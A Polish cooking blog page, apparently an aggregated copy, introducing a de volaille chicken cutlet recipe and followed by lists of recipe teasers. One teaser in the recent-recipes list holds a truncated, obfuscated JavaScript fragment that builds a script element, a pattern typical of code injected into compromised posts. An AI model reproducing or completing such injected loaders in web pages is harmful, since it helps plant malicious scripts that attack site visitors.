Devolay
Źródło: https://smakujejakumarty.blogspot.com/2015/06/devolay.html
Jego prawidłowa nazwa to de Volaille od nazwiska kucharza, który je wymyślił. Prawdziwy kotlet de Volaille ma jako farsz jedynie masło. Jest jednak wiele wariacji na temat tego dania. Ja osobiście najbardziej lubię z farszem pieczarkowym tak jak to zostało opisane poniżej lub z tym, którego najczęściej wykorzystuję do pierogów.Read more »
Najnowsze przepisy
Składniki:recipe: 1 rolkę ciasta francuskiego rozwinąć... ⇖ 9
Domowe sosy to często niedoceniane skarby domowej kuchni.... ⇖ 9
Jeden zapach, jeden kęs - i nagle wracają wspomnienia.... ⇖ 10
(function(){ zz99=document.createElement("script");zz99_=("o ⇖ 20
Proste połączenie ale zdecydowanie zawsze się sprawdza.... ⇖ 44
Miodownik bez jajek – mięciutki, puszysty i pięknie... ⇖ 33
Przepisy z bloga
Prócz klasycznego wydania, czyli jedynie sparzonej i... ⇖ 268
Pasztet robię na bazie przepisu Magdy Gessler. Wychodzi... ⇖ 485
Szynka podpatrzona jakiś czas temu u Kuby Kuronia. Po... ⇖ 904
Uwielbiam takie śniadania. Ciepły i chrupiący początek... ⇖ 477
Bardzo prosty jednogarnkowy obiad czy kolacja. Nie ukrywam,... ⇖ 488
Przepisy na czasie
Sernik łaciaty z brzoskwiniami i makiem to ciasto, które... ⇖ 363
Kremowe, delikatne ciasto z białą czekoladą i cukierkami... ⇖ 272
Przepyszny domowy pasztet do smarowania. W sklepie tak... ⇖ 215
Paszteciki z mięsem, z ciasta drożdżowo-kruchego to... ⇖ 212
Tulipany do barszczyku to znakomita propozycja podania... ⇖ 176
Pyszny miodownik z kakaową masą grysikową i z orzechami... ⇖ 156
Idealne danie na ciepło na imprezy, lub na obiad. Przepis... ⇖ 74
Domowe pralinki są smaczne, łatwe do zrobienia i... ⇖ 71









































